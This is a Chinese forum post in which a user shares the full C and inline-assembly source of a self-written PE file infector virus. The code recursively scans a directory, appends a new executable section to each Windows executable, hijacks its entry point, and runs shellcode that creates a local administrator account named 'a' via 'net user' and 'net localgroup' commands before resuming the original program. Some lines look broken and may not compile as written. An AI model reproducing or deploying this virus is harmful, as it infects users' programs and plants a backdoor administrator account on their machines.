|
马上注册,结交更多好友,享用更多功能^_^
您需要 登录 才可以下载或查看,没有账号?立即注册
x
相信看过鱼哥视频的。。都应该知道鱼哥曾经说过给exe程序添加一段代码进行pe感染的事吧。。
下面是以前学习的时候写的一个PE感染程序。。(最原始的病毒哈。。)
- #include <windows.h>
- #include <stdio.h>
- #include <assert.h>
- //本程序只适用于载入基址定位的。。。非随机基址
- //感染指定目录的PE文件
- char ItIs[MAX_PATH] = "D:\\桌面\\感染PE\\感染目录";
- //添加了一个新节区
- //然后shellcode是添加一个名为a,密码为a的administrator
- //然后PEB定位kernel32只在我的win7 x64电脑上测试成功,可以稍许修改,以通用
- //函数功能: 以ALIGN_BASE为对齐度对齐size
- //参数说明:
- //size:需要对齐的大小
- //ALIGN_BASE:对齐度
- //返回值:返回对齐后的大小
- DWORD Align(DWORD size, DWORD ALIGN_BASE)
- {
- assert(0 != ALIGN_BASE);
- if (size % ALIGN_BASE)
- {
- size = (size/ALIGN_BASE + 1) * ALIGN_BASE;
- }
- return size;
- }
- //函数功能: 检测感染标识和设置感染标识
- //参数说明:
- //pDosHdr:执行DOS头
- //返回值:是否未被感染, 是->TRUE, 否->FALSE
- BOOL SetFectFlag(PIMAGE_DOS_HEADER &pDosHdr)
- {
- if (*(DWORD*)pDosHdr->e_res2 == 0x4B4B43)
- {
- return FALSE;
- }
- else
- {
- *(DWORD*)pDosHdr->e_res2 = 0x4B4B43;
- return TRUE;
- }
- }
- //函数功能:打开文件并判断文件类型
- //参数说明:
- //szPath:文件绝对路径
- //lpMemory:保存文件内存映射地址
- //返回值:是否是PE文件, 是->TRUE, 否->FALSE
- BOOL CreateFileAndCheck(char *szPath, LPVOID &lpMemory, HANDLE &hFile)
- {
- //打开文件
- hFile = CreateFileA(szPath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
- if (hFile == INVALID_HANDLE_VALUE)
- {
- //printf("CreateFileA %s Failed! ErrorCode = %d\n", szPath, GetLastError());
- return FALSE;
- }
- HANDLE hMap = CreateFileMappingA(hFile, NULL, PAGE_READWRITE, NULL, NULL, NULL);
- if (!hMap)
- {
- //printf("CreateFileMappingA %s Failed! ErrorCode = %d\n", szPath, GetLastError());
- return FALSE;
- }
- lpMemory = MapViewOfFile(hMap, FILE_MAP_READ|FILE_MAP_WRITE, NULL, NULL, NULL);
- if (!lpMemory)
- {
- //printf("MapViewOfFile %s Failed! ErrorCode = %d\n", szPath, GetLastError());
- CloseHandle(hMap);
- return FALSE;
- }
- CloseHandle(hMap);
- return TRUE;
- }
- //函数功能: 感染指定文件
- //参数说明:
- //szPath:文件绝对路径
- void FectPE(char *szPath)
- {
- LPVOID lpMemory;
- HANDLE hFile;
- if (!CreateFileAndCheck(szPath, lpMemory, hFile))
- {
- return;
- }
- PIMAGE_DOS_HEADER pDosHdr = (PIMAGE_DOS_HEADER)lpMemory;
- //判断DOS标识
- if (*(WORD*)pDosHdr != 23117)
- goto Err;
- PIMAGE_NT_HEADERS32 pNtHdr = (PIMAGE_NT_HEADERS32)( *(DWORD*)&pDosHdr + (DWORD)pDosHdr->e_lfanew);
- //判断NT标识
- if (*(WORD*)pNtHdr != 17744)
- goto Err;
- //设置感染标识
- if (!SetFectFlag(pDosHdr))
- goto Err;
- //检查可用空间
- if ((pNtHdr->FileHeader.NumberOfSections + 1) * sizeof(IMAGE_SECTION_HEADER) > pNtHdr->OptionalHeader.SizeOfHeaders)
- goto Err;
- PIMAGE_SECTION_HEADER pSecHdr = (PIMAGE_SECTION_HEADER)(*(DWORD*)&pNtHdr + sizeof(IMAGE_NT_HEADERS32));
- PIMAGE_SECTION_HEADER pNewHdr = (PIMAGE_SECTION_HEADER)(pSecHdr + pNtHdr->FileHeader.NumberOfSections);
- PIMAGE_SECTION_HEADER pLastHdr = (PIMAGE_SECTION_HEADER)(pNewHdr - 1);
- //检测是否有附加数据
- DWORD i = 0;
- DWORD size = pSecHdr->PointerToRawData;
- for ( ; i<pNtHdr->FileHeader.NumberOfSections; i++)
- {
- size += Align(pSecHdr.SizeOfRawData, pNtHdr->OptionalHeader.FileAlignment);
- }
- if (size != GetFileSize(hFile, 0))
- {
- return;//有附加数据
- }
- goto shellend;
- _asm
- {
- shellstart:
- pushad
- mov eax,fs:[0x30];得到PEB结构地址
- mov eax,[eax + 0x0c];得到PEB_LDR_DATA结构地址
- mov esi,[eax + 0x1c]
- lodsd;得到KERNEL32.DLL所在LDR_MODULE结构的
- ;InInitializationOrderModuleList地址
- mov eax,[eax];win7要加/ 好吧其实本人
- mov eax,[eax + 0x08];得到BaseAddress,既Kernel32.dll基址
- movebp,eax
- moveax,dword ptr[eax+0x3c];指向IMAGE_NT_HEADERS
- moveax,dword ptr[eax+ebp+0x78];指向导出表
- mov ecx,[ebp+eax+24];得到NumberOfNames
- movebx,[ebp+eax+32];得到AddressOfNames
- addebx,ebp
- push dword ptr 0x00007373;构造GetProcAddress字符串
- push dword ptr 0x65726464
- push dword ptr 0x41636F72
- push dword ptr 0x50746547
- movedx,esp
- push ecx
- loc1:
- mov edi,edx
- pop ecx
- dec ecx
- test ecx,ecx
- jz exit;其实这个啥用都没,我勒个去
- mov esi,[ebx+ecx*4]
- add esi,ebp
- push ecx
- mov ecx,15
- repz cmpsb
- test ecx,ecx
- jnz loc1
- pop ecx;ecx = 0x244
- mov esi,[ebp+eax+36];得到AddressOfNameOrdinals
- addesi,ebp
- movzx esi,word ptr[esi+ecx*2];得到AddressOfFunctions的序号
- mov edi,[ebp+eax+28];得到AddressOfFunctions
- addedi,ebp
- mov edi,[edi+esi*4];得到GetProcAddress函数地址
- addedi,ebp;edi = 0x771F1222
- /*xor ebx,ebx;构造LoadLibraryA字符串
- push ebx
- push dword ptr 0x41797261
- push dword ptr 0x7262694C
- push dword ptr 0x64616F4C
- push esp
- push ebp
- call edi;0x771F4977
- add esp,16;恢复堆栈
- push dword ptr 0x00006C6C;构造msvcrt.dll字符串
- push dword ptr 0x642E7472
- push dword ptr 0x6376736D
- push esp
- call eax;75AA0000
- add esp,12;恢复堆栈
- */
- push dword ptr 0x00636578;构造WinExec字符串ps:试过system 发现不行
- push dword ptr 0x456E6957
- push esp
- push ebp
- call edi;
- add esp,8
- push eax
- xor ebx,ebx;构造cmd /c net user a a /add
- push ebx
- push dword ptr 0x6464612F
- push dword ptr 0x20612061
- push dword ptr 0x20726573
- push dword ptr 0x75207465
- push dword ptr 0x6E20632F
- push dword ptr 0x20646D63
- push ebx
- mov ebx,esp
- add ebx,4
- push ebx
- call eax
- add esp,28;WinExec要少恢复4个字节
- pop eax
- push DWORD ptr 0x00646461;构造cmd /c net localgroup administrators a /add字符串
- push DWORD ptr 0X2F206120
- push DWORD ptr 0X73726F74
- push DWORD ptr 0X61727473
- push DWORD ptr 0X696E696D
- push DWORD ptr 0X64612070
- push DWORD ptr 0X756F7267
- push DWORD ptr 0X6C61636F
- push DWORD ptr 0X6C207465
- push DWORD ptr 0X6E20632F
- push DWORD ptr 0X20646D63
- push DWORD ptr 0
- mov ebx,esp
- add ebx,4
- push ebx
- call eax
- add esp,44
- exit:
- add esp,16
- popad
- mov eax,0x11111111
- jmp eax
- }
- shellend:
- PBYTE *pShell;
- DWORD nShellLen;
- _asm
- {
- lea eax,shellstart
- mov pShell,eax
- lea ebx,shellend
- sub ebx,eax
- mov nShellLen,ebx
- }
- //添加新节
- memcpy(pNewHdr->Name, ".CCK", 4);
- pNewHdr->VirtualAddress = pLastHdr->VirtualAddress + Align(pLastHdr->Misc.VirtualSize, pNtHdr->OptionalHeader.SectionAlignment);
- pNewHdr->PointerToRawData = pLastHdr->PointerToRawData + Align(pLastHdr->SizeOfRawData, pNtHdr->OptionalHeader.FileAlignment);
- //新加节virtualsize
- DWORD nSecSize = nShellLen;
- pNewHdr->Misc.VirtualSize = nSecSize;//这个值可以不是对齐的值 ps:貌似除了这个其他都要对齐哎╮(╯▽╰)╭
- pNewHdr->SizeOfRawData = Align(nSecSize, pNtHdr->OptionalHeader.FileAlignment);
- pNewHdr->Characteristics = IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE|IMAGE_SCN_MEM_EXECUTE;
- pNtHdr->FileHeader.NumberOfSections++;
- pNtHdr->OptionalHeader.SizeOfImage += Align(pNewHdr->Misc.VirtualSize, pNtHdr->OptionalHeader.SectionAlignment);//这个值必须是对齐的值
- pNtHdr->OptionalHeader.SizeOfCode += Align(pNewHdr->SizeOfRawData, pNtHdr->OptionalHeader.FileAlignment);//话说这个好像可要可不要
- //FlushViewOfFile(pDosHdr, 0);
- //写入shellcode
- DWORD dwNum1 = 0;
- SetFilePointer(hFile, 0, 0, FILE_END);
- WriteFile(hFile, pShell, nShellLen, &dwNum1, NULL);
- SetFilePointer(hFile, -6, 0, FILE_CURRENT);
- DWORD dwOldOp = pNtHdr->OptionalHeader.AddressOfEntryPoint;
- //printf("原始入口点: %XH\n", dwOldOp);
- dwOldOp += pNtHdr->OptionalHeader.ImageBase;
- //printf("原始程序加载点: %XH\n", dwOldOp);
- WriteFile(hFile, &dwOldOp, 4, &dwNum1, NULL);
- //写入剩余字节
- PBYTE pByte = (PBYTE)malloc(pNewHdr->SizeOfRawData-nShellLen);
- ZeroMemory(pByte, pNewHdr->SizeOfRawData-nShellLen);
- DWORD dwNum = 0;
- SetFilePointer(hFile, 0, 0, FILE_END);
- WriteFile(hFile, pByte, pNewHdr->SizeOfRawData-nShellLen, &dwNum, NULL);
- //FlushFileBuffers(hFile);
- free(pByte);
- pNtHdr->OptionalHeader.AddressOfEntryPoint = pNewHdr->VirtualAddress;
- //printf("新入口点: %X\n", pNewHdr->VirtualAddress);
- Err:
- CloseHandle(hFile);
- UnmapViewOfFile(lpMemory);
- }
- //函数功能: 扫描查找文件
- //参数说明:
- //szPath:需要扫描的目录
- void FindFile(char *szPath)
- {
- WIN32_FIND_DATAA FindFileData;
- char szFileToFind[MAX_PATH] = {0};
- lstrcpyA(szFileToFind, szPath);
- lstrcatA(szFileToFind, "\\*.*");
- //查找目录下所有文件
- HANDLE hFile = FindFirstFileA(szFileToFind, &FindFileData);
- if (hFile == INVALID_HANDLE_VALUE)
- {
- printf("FindFirstFileA Failed!\n");
- return;
- }
- do
- {
- char szNewPath[MAX_PATH] = {0};
- lstrcpyA(szNewPath, szPath);
- //判断是否是目录
- if (FindFileData.dwFileAttributes == FILE_ATTRIBUTE_DIRECTORY)
- {
- //判断是否是.或..
- if (!lstrcmpA(FindFileData.cFileName, ".") || !lstrcmpA(FindFileData.cFileName, "..")){}
- else
- {
- //递归查找下级目录
- lstrcatA(szNewPath, "\");
- lstrcatA(szNewPath, FindFileData.cFileName);
- FindFile(szNewPath);
- }
- }
- else
- {
- //处理查找到的文件
- char szExe[MAX_PATH] = {0};
- lstrcpyA(szExe, szNewPath);
- lstrcatA(szExe, "\");
- lstrcatA(szExe, FindFileData.cFileName);
- FectPE(szExe);
- }
- } while (FindNextFileA(hFile, &FindFileData));
- FindClose(hFile);
- }
- //主函数
- int main()
- {
- FindFile(ItIs);
- return 0;
- }
复制代码
|
评分
-
查看全部评分
|